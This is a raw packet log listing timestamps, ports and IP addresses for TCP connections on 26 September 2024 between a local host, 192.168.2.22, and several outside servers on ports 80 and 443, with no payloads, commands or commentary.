Sep 26, 2024 09:19:23.078846931 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.078864098 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.078867912 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.078877926 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.078887939 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.078907967 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.078921080 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.078948975 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.078986883 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.079149008 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.079165936 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.079183102 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.079194069 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.079200029 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.079205990 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.079217911 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.079220057 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.079236031 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.079250097 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.079272032 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.079288960 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.079305887 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.079313993 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.079330921 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.079339981 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.079511881 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.079530001 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.079545975 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.079555988 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.079562902 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.079570055 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.079580069 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.079585075 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.079596996 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.079598904 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.079612970 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.079612970 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.079631090 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.079634905 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.079648972 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.079654932 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.079663992 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.079664946 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.079680920 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.079682112 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.079696894 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.079699993 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.079713106 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.079716921 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.079735041 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.079736948 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.079751015 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.079754114 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.079770088 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.079771996 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.079785109 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.079801083 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.079844952 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.079854965 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.079862118 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.079874992 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.079879999 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.079893112 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.079893112 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.079915047 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.080404043 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.080420971 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.080436945 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.080454111 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.080466032 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.080466032 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.080471039 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.080487013 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.080492973 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.080492973 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.080503941 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.080519915 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.080553055 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.080569029 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.080584049 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.080599070 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.080615044 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.080631971 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.080647945 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.080667019 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.080719948 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.080737114 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.080739021 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.080739975 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.080739975 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.080739975 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.080739975 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.080739975 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.080739975 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.080739975 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.080753088 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.080770016 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.080777884 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.080777884 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.080786943 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.080790997 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.080805063 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.080805063 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.080827951 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.080841064 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.081280947 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.081298113 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.081315041 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.081331015 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.081331968 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.081343889 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.081347942 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.081351995 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.081366062 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.081372976 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.081382990 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.081393003 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.081399918 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.081402063 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.081420898 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.081428051 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.081437111 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.081444025 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.081461906 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.081466913 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.081479073 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.081480980 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.081495047 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.081497908 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.081512928 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.081515074 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.081531048 CEST	80	49161	66.63.187.123	192.168.2.22
Sep 26, 2024 09:19:23.081537008 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.081548929 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.081572056 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.081621885 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:23.282231092 CEST	49161	80	192.168.2.22	66.63.187.123
Sep 26, 2024 09:19:26.809554100 CEST	49162	80	192.168.2.22	193.122.130.0
Sep 26, 2024 09:19:26.815483093 CEST	80	49162	193.122.130.0	192.168.2.22
Sep 26, 2024 09:19:26.815572023 CEST	49162	80	192.168.2.22	193.122.130.0
Sep 26, 2024 09:19:26.832587957 CEST	49162	80	192.168.2.22	193.122.130.0
Sep 26, 2024 09:19:26.840173006 CEST	80	49162	193.122.130.0	192.168.2.22
Sep 26, 2024 09:19:27.301414013 CEST	80	49162	193.122.130.0	192.168.2.22
Sep 26, 2024 09:19:27.392745972 CEST	49162	80	192.168.2.22	193.122.130.0
Sep 26, 2024 09:19:27.397722006 CEST	80	49162	193.122.130.0	192.168.2.22
Sep 26, 2024 09:19:27.502219915 CEST	80	49162	193.122.130.0	192.168.2.22
Sep 26, 2024 09:19:27.567519903 CEST	49163	443	192.168.2.22	188.114.97.3
Sep 26, 2024 09:19:27.567616940 CEST	443	49163	188.114.97.3	192.168.2.22
Sep 26, 2024 09:19:27.567687035 CEST	49163	443	192.168.2.22	188.114.97.3
Sep 26, 2024 09:19:27.591738939 CEST	49163	443	192.168.2.22	188.114.97.3
Sep 26, 2024 09:19:27.591779947 CEST	443	49163	188.114.97.3	192.168.2.22
Sep 26, 2024 09:19:27.712093115 CEST	49162	80	192.168.2.22	193.122.130.0
Sep 26, 2024 09:19:28.067327976 CEST	443	49163	188.114.97.3	192.168.2.22
Sep 26, 2024 09:19:28.067456007 CEST	49163	443	192.168.2.22	188.114.97.3
Sep 26, 2024 09:19:28.079863071 CEST	49163	443	192.168.2.22	188.114.97.3
Sep 26, 2024 09:19:28.079914093 CEST	443	49163	188.114.97.3	192.168.2.22
Sep 26, 2024 09:19:28.080454111 CEST	443	49163	188.114.97.3	192.168.2.22
Sep 26, 2024 09:19:28.193497896 CEST	49163	443	192.168.2.22	188.114.97.3
Sep 26, 2024 09:19:28.239415884 CEST	443	49163	188.114.97.3	192.168.2.22
Sep 26, 2024 09:19:28.683459044 CEST	443	49163	188.114.97.3	192.168.2.22
Sep 26, 2024 09:19:28.683594942 CEST	443	49163	188.114.97.3	192.168.2.22
Sep 26, 2024 09:19:28.683656931 CEST	49163	443	192.168.2.22	188.114.97.3
Sep 26, 2024 09:19:28.685745955 CEST	49163	443	192.168.2.22	188.114.97.3
Sep 26, 2024 09:19:28.709939003 CEST	49162	80	192.168.2.22	193.122.130.0
Sep 26, 2024 09:19:28.715164900 CEST	80	49162	193.122.130.0	192.168.2.22
Sep 26, 2024 09:19:28.830696106 CEST	80	49162	193.122.130.0	192.168.2.22
Sep 26, 2024 09:19:28.833806992 CEST	49164	443	192.168.2.22	188.114.97.3
Sep 26, 2024 09:19:28.833858967 CEST	443	49164	188.114.97.3	192.168.2.22
Sep 26, 2024 09:19:28.834022045 CEST	49164	443	192.168.2.22	188.114.97.3
Sep 26, 2024 09:19:28.834458113 CEST	49164	443	192.168.2.22	188.114.97.3
Sep 26, 2024 09:19:28.834467888 CEST	443	49164	188.114.97.3	192.168.2.22
Sep 26, 2024 09:19:29.038086891 CEST	49162	80	192.168.2.22	193.122.130.0
Sep 26, 2024 09:19:29.306684017 CEST	443	49164	188.114.97.3	192.168.2.22
Sep 26, 2024 09:19:29.317909956 CEST	49164	443	192.168.2.22	188.114.97.3
Sep 26, 2024 09:19:29.317924976 CEST	443	49164	188.114.97.3	192.168.2.22
Sep 26, 2024 09:19:29.445250988 CEST	443	49164	188.114.97.3	192.168.2.22
Sep 26, 2024 09:19:29.445355892 CEST	443	49164	188.114.97.3	192.168.2.22
Sep 26, 2024 09:19:29.445488930 CEST	49164	443	192.168.2.22	188.114.97.3
Sep 26, 2024 09:19:29.445923090 CEST	49164	443	192.168.2.22	188.114.97.3
Sep 26, 2024 09:19:29.462188959 CEST	49162	80	192.168.2.22	193.122.130.0
Sep 26, 2024 09:19:29.467304945 CEST	80	49162	193.122.130.0	192.168.2.22
Sep 26, 2024 09:19:29.467417002 CEST	49162	80	192.168.2.22	193.122.130.0
Sep 26, 2024 09:19:29.485241890 CEST	49165	80	192.168.2.22	132.226.247.73
Sep 26, 2024 09:19:29.490550995 CEST	80	49165	132.226.247.73	192.168.2.22
Sep 26, 2024 09:19:29.490608931 CEST	49165	80	192.168.2.22	132.226.247.73
Sep 26, 2024 09:19:29.490706921 CEST	49165	80	192.168.2.22	132.226.247.73
Sep 26, 2024 09:19:29.495477915 CEST	80	49165	132.226.247.73	192.168.2.22
Sep 26, 2024 09:19:30.178728104 CEST	80	49165	132.226.247.73	192.168.2.22
Sep 26, 2024 09:19:30.232368946 CEST	49166	443	192.168.2.22	188.114.96.3
Sep 26, 2024 09:19:30.232470036 CEST	443	49166	188.114.96.3	192.168.2.22
Sep 26, 2024 09:19:30.232542038 CEST	49166	443	192.168.2.22	188.114.96.3
Sep 26, 2024 09:19:30.232830048 CEST	49166	443	192.168.2.22	188.114.96.3
Sep 26, 2024 09:19:30.232860088 CEST	443	49166	188.114.96.3	192.168.2.22
Sep 26, 2024 09:19:30.391808987 CEST	80	49165	132.226.247.73	192.168.2.22
Sep 26, 2024 09:19:30.394685984 CEST	49165	80	192.168.2.22	132.226.247.73
Sep 26, 2024 09:19:30.698385954 CEST	443	49166	188.114.96.3	192.168.2.22
Sep 26, 2024 09:19:30.701658964 CEST	49166	443	192.168.2.22	188.114.96.3
Sep 26, 2024 09:19:30.701731920 CEST	443	49166	188.114.96.3	192.168.2.22
Sep 26, 2024 09:19:30.835622072 CEST	443	49166	188.114.96.3	192.168.2.22
Sep 26, 2024 09:19:30.835736990 CEST	443	49166	188.114.96.3	192.168.2.22
Sep 26, 2024 09:19:30.835845947 CEST	49166	443	192.168.2.22	188.114.96.3
Sep 26, 2024 09:19:30.836256027 CEST	49166	443	192.168.2.22	188.114.96.3
Sep 26, 2024 09:19:31.267055988 CEST	49167	80	192.168.2.22	193.122.130.0
Sep 26, 2024 09:19:31.273471117 CEST	80	49167	193.122.130.0	192.168.2.22
Sep 26, 2024 09:19:31.273541927 CEST	49167	80	192.168.2.22	193.122.130.0
Sep 26, 2024 09:19:31.273746014 CEST	49167	80	192.168.2.22	193.122.130.0
Sep 26, 2024 09:19:31.279247046 CEST	80	49167	193.122.130.0	192.168.2.22
Sep 26, 2024 09:19:31.730346918 CEST	80	49167	193.122.130.0	192.168.2.22
Sep 26, 2024 09:19:31.753818035 CEST	49168	443	192.168.2.22	188.114.96.3
Sep 26, 2024 09:19:31.753849983 CEST	443	49168	188.114.96.3	192.168.2.22
Sep 26, 2024 09:19:31.753900051 CEST	49168	443	192.168.2.22	188.114.96.3
Sep 26, 2024 09:19:31.754297972 CEST	49168	443	192.168.2.22	188.114.96.3
Sep 26, 2024 09:19:31.754313946 CEST	443	49168	188.114.96.3	192.168.2.22
Sep 26, 2024 09:19:31.939692020 CEST	49167	80	192.168.2.22	193.122.130.0
Sep 26, 2024 09:19:32.218127966 CEST	443	49168	188.114.96.3	192.168.2.22
Sep 26, 2024 09:19:32.221108913 CEST	49168	443	192.168.2.22	188.114.96.3
Sep 26, 2024 09:19:32.221124887 CEST	443	49168	188.114.96.3	192.168.2.22
Sep 26, 2024 09:19:32.367609978 CEST	443	49168	188.114.96.3	192.168.2.22
Sep 26, 2024 09:19:32.367714882 CEST	443	49168	188.114.96.3	192.168.2.22
Sep 26, 2024 09:19:32.367933989 CEST	49168	443	192.168.2.22	188.114.96.3
Sep 26, 2024 09:19:32.368870974 CEST	49168	443	192.168.2.22	188.114.96.3
Sep 26, 2024 09:19:32.385329962 CEST	49167	80	192.168.2.22	193.122.130.0
Sep 26, 2024 09:19:32.390687943 CEST	80	49167	193.122.130.0	192.168.2.22
Sep 26, 2024 09:19:32.391993999 CEST	49167	80	192.168.2.22	193.122.130.0
Sep 26, 2024 09:19:32.411257029 CEST	49169	80	192.168.2.22	132.226.8.169
Sep 26, 2024 09:19:32.417282104 CEST	80	49169	132.226.8.169	192.168.2.22
Sep 26, 2024 09:19:32.417346954 CEST	49169	80	192.168.2.22	132.226.8.169
Sep 26, 2024 09:19:32.417438984 CEST	49169	80	192.168.2.22	132.226.8.169
Sep 26, 2024 09:19:32.423224926 CEST	80	49169	132.226.8.169	192.168.2.22
Sep 26, 2024 09:19:33.318089962 CEST	80	49169	132.226.8.169	192.168.2.22
Sep 26, 2024 09:19:33.332324028 CEST	49170	443	192.168.2.22	188.114.96.3
Sep 26, 2024 09:19:33.332376003 CEST	443	49170	188.114.96.3	192.168.2.22
Sep 26, 2024 09:19:33.332439899 CEST	49170	443	192.168.2.22	188.114.96.3
Sep 26, 2024 09:19:33.332834005 CEST	49170	443	192.168.2.22	188.114.96.3
Sep 26, 2024 09:19:33.332848072 CEST	443	49170	188.114.96.3	192.168.2.22
Sep 26, 2024 09:19:33.527750015 CEST	80	49169	132.226.8.169	192.168.2.22
Sep 26, 2024 09:19:33.527946949 CEST	49169	80	192.168.2.22	132.226.8.169
Sep 26, 2024 09:19:33.818011999 CEST	443	49170	188.114.96.3	192.168.2.22
Sep 26, 2024 09:19:33.821438074 CEST	49170	443	192.168.2.22	188.114.96.3
Sep 26, 2024 09:19:33.821456909 CEST	443	49170	188.114.96.3	192.168.2.22
Sep 26, 2024 09:19:33.963834047 CEST	443	49170	188.114.96.3	192.168.2.22
Sep 26, 2024 09:19:33.963969946 CEST	443	49170	188.114.96.3	192.168.2.22
Sep 26, 2024 09:19:33.964016914 CEST	49170	443	192.168.2.22	188.114.96.3
Sep 26, 2024 09:19:33.964555025 CEST	49170	443	192.168.2.22	188.114.96.3
Sep 26, 2024 09:19:33.980979919 CEST	49169	80	192.168.2.22	132.226.8.169
Sep 26, 2024 09:19:33.986181974 CEST	80	49169	132.226.8.169	192.168.2.22
Sep 26, 2024 09:19:33.986244917 CEST	49169	80	192.168.2.22	132.226.8.169
Sep 26, 2024 09:19:34.008749962 CEST	49171	80	192.168.2.22	158.101.44.242
Sep 26, 2024 09:19:34.013578892 CEST	80	49171	158.101.44.242	192.168.2.22
Sep 26, 2024 09:19:34.013638973 CEST	49171	80	192.168.2.22	158.101.44.242
Sep 26, 2024 09:19:34.013765097 CEST	49171	80	192.168.2.22	158.101.44.242
Sep 26, 2024 09:19:34.018505096 CEST	80	49171	158.101.44.242	192.168.2.22
Sep 26, 2024 09:19:35.386447906 CEST	80	49171	158.101.44.242	192.168.2.22
Sep 26, 2024 09:19:35.401029110 CEST	49172	443	192.168.2.22	188.114.96.3
Sep 26, 2024 09:19:35.401091099 CEST	443	49172	188.114.96.3	192.168.2.22
Sep 26, 2024 09:19:35.401145935 CEST	49172	443	192.168.2.22	188.114.96.3
Sep 26, 2024 09:19:35.401443958 CEST	49172	443	192.168.2.22	188.114.96.3
Sep 26, 2024 09:19:35.401463032 CEST	443	49172	188.114.96.3	192.168.2.22
Sep 26, 2024 09:19:35.590096951 CEST	49171	80	192.168.2.22	158.101.44.242
Sep 26, 2024 09:19:35.884170055 CEST	443	49172	188.114.96.3	192.168.2.22
Sep 26, 2024 09:19:35.887286901 CEST	49172	443	192.168.2.22	188.114.96.3
Sep 26, 2024 09:19:35.887326002 CEST	443	49172	188.114.96.3	192.168.2.22
Sep 26, 2024 09:19:36.028742075 CEST	443	49172	188.114.96.3	192.168.2.22
Sep 26, 2024 09:19:36.028863907 CEST	443	49172	188.114.96.3	192.168.2.22
Sep 26, 2024 09:19:36.028918982 CEST	49172	443	192.168.2.22	188.114.96.3
Sep 26, 2024 09:19:36.029406071 CEST	49172	443	192.168.2.22	188.114.96.3
Sep 26, 2024 09:19:36.045855045 CEST	49171	80	192.168.2.22	158.101.44.242
Sep 26, 2024 09:19:36.050939083 CEST	80	49171	158.101.44.242	192.168.2.22
Sep 26, 2024 09:19:36.050992966 CEST	49171	80	192.168.2.22	158.101.44.242
Sep 26, 2024 09:19:36.067742109 CEST	49173	80	192.168.2.22	132.226.8.169
Sep 26, 2024 09:19:36.073045015 CEST	80	49173	132.226.8.169	192.168.2.22
Sep 26, 2024 09:19:36.073096991 CEST	49173	80	192.168.2.22	132.226.8.169
Sep 26, 2024 09:19:36.073292971 CEST	49173	80	192.168.2.22	132.226.8.169
Sep 26, 2024 09:19:36.078071117 CEST	80	49173	132.226.8.169	192.168.2.22
Sep 26, 2024 09:19:37.890122890 CEST	80	49173	132.226.8.169	192.168.2.22
Sep 26, 2024 09:19:37.909267902 CEST	49174	443	192.168.2.22	188.114.96.3
Sep 26, 2024 09:19:37.909297943 CEST	443	49174	188.114.96.3	192.168.2.22
Sep 26, 2024 09:19:37.909370899 CEST	49174	443	192.168.2.22	188.114.96.3
Sep 26, 2024 09:19:37.909872055 CEST	49174	443	192.168.2.22	188.114.96.3
Sep 26, 2024 09:19:37.909883022 CEST	443	49174	188.114.96.3	192.168.2.22
Sep 26, 2024 09:19:38.095905066 CEST	80	49173	132.226.8.169	192.168.2.22
Sep 26, 2024 09:19:38.095973969 CEST	49173	80	192.168.2.22	132.226.8.169
Sep 26, 2024 09:19:38.386639118 CEST	443	49174	188.114.96.3	192.168.2.22
Sep 26, 2024 09:19:38.399437904 CEST	49174	443	192.168.2.22	188.114.96.3
Sep 26, 2024 09:19:38.399454117 CEST	443	49174	188.114.96.3	192.168.2.22
Sep 26, 2024 09:19:38.547068119 CEST	443	49174	188.114.96.3	192.168.2.22
Sep 26, 2024 09:19:38.547168970 CEST	443	49174	188.114.96.3	192.168.2.22
Sep 26, 2024 09:19:38.547208071 CEST	49174	443	192.168.2.22	188.114.96.3
Sep 26, 2024 09:19:38.547625065 CEST	49174	443	192.168.2.22	188.114.96.3
Sep 26, 2024 09:19:38.565224886 CEST	49173	80	192.168.2.22	132.226.8.169
Sep 26, 2024 09:19:38.570389032 CEST	80	49173	132.226.8.169	192.168.2.22
Sep 26, 2024 09:19:38.570477009 CEST	49173	80	192.168.2.22	132.226.8.169
Sep 26, 2024 09:19:38.624629974 CEST	49175	80	192.168.2.22	158.101.44.242
Sep 26, 2024 09:19:38.629430056 CEST	80	49175	158.101.44.242	192.168.2.22
Sep 26, 2024 09:19:38.629497051 CEST	49175	80	192.168.2.22	158.101.44.242
Sep 26, 2024 09:19:38.634649038 CEST	49175	80	192.168.2.22	158.101.44.242
Sep 26, 2024 09:19:38.639511108 CEST	80	49175	158.101.44.242	192.168.2.22
Sep 26, 2024 09:19:39.532187939 CEST	80	49175	158.101.44.242	192.168.2.22
Sep 26, 2024 09:19:39.547167063 CEST	49176	443	192.168.2.22	188.114.96.3
Sep 26, 2024 09:19:39.547261953 CEST	443	49176	188.114.96.3	192.168.2.22
Sep 26, 2024 09:19:39.547353983 CEST	49176	443	192.168.2.22	188.114.96.3
Sep 26, 2024 09:19:39.547683001 CEST	49176	443	192.168.2.22	188.114.96.3
Sep 26, 2024 09:19:39.547717094 CEST	443	49176	188.114.96.3	192.168.2.22
Sep 26, 2024 09:19:39.739985943 CEST	49175	80	192.168.2.22	158.101.44.242
Sep 26, 2024 09:19:40.009524107 CEST	443	49176	188.114.96.3	192.168.2.22
Sep 26, 2024 09:19:40.012712002 CEST	49176	443	192.168.2.22	188.114.96.3
Sep 26, 2024 09:19:40.012765884 CEST	443	49176	188.114.96.3	192.168.2.22
Sep 26, 2024 09:19:40.147774935 CEST	443	49176	188.114.96.3	192.168.2.22
Sep 26, 2024 09:19:40.147967100 CEST	443	49176	188.114.96.3	192.168.2.22
Sep 26, 2024 09:19:40.148019075 CEST	49176	443	192.168.2.22	188.114.96.3
Sep 26, 2024 09:19:40.148473024 CEST	49176	443	192.168.2.22	188.114.96.3
Sep 26, 2024 09:19:40.164752007 CEST	49175	80	192.168.2.22	158.101.44.242
Sep 26, 2024 09:19:40.170172930 CEST	80	49175	158.101.44.242	192.168.2.22
Sep 26, 2024 09:19:40.170226097 CEST	49175	80	192.168.2.22	158.101.44.242
Sep 26, 2024 09:19:40.188426971 CEST	49177	80	192.168.2.22	193.122.130.0
Sep 26, 2024 09:19:40.194562912 CEST	80	49177	193.122.130.0	192.168.2.22
Sep 26, 2024 09:19:40.194610119 CEST	49177	80	192.168.2.22	193.122.130.0
Sep 26, 2024 09:19:40.194757938 CEST	49177	80	192.168.2.22	193.122.130.0
Sep 26, 2024 09:19:40.199491024 CEST	80	49177	193.122.130.0	192.168.2.22
Sep 26, 2024 09:19:40.650068045 CEST	80	49177	193.122.130.0	192.168.2.22
Sep 26, 2024 09:19:40.666199923 CEST	49178	443	192.168.2.22	188.114.97.3
Sep 26, 2024 09:19:40.666235924 CEST	443	49178	188.114.97.3	192.168.2.22
Sep 26, 2024 09:19:40.666287899 CEST	49178	443	192.168.2.22	188.114.97.3
Sep 26, 2024 09:19:40.666698933 CEST	49178	443	192.168.2.22	188.114.97.3
Sep 26, 2024 09:19:40.666712046 CEST	443	49178	188.114.97.3	192.168.2.22
Sep 26, 2024 09:19:40.847318888 CEST	49177	80	192.168.2.22	193.122.130.0
Sep 26, 2024 09:19:41.120532990 CEST	443	49178	188.114.97.3	192.168.2.22
Sep 26, 2024 09:19:41.124633074 CEST	49178	443	192.168.2.22	188.114.97.3
Sep 26, 2024 09:19:41.124644995 CEST	443	49178	188.114.97.3	192.168.2.22
Sep 26, 2024 09:19:41.256162882 CEST	443	49178	188.114.97.3	192.168.2.22
Sep 26, 2024 09:19:41.256263018 CEST	443	49178	188.114.97.3	192.168.2.22
Sep 26, 2024 09:19:41.256345987 CEST	49178	443	192.168.2.22	188.114.97.3
Sep 26, 2024 09:19:41.257020950 CEST	49178	443	192.168.2.22	188.114.97.3
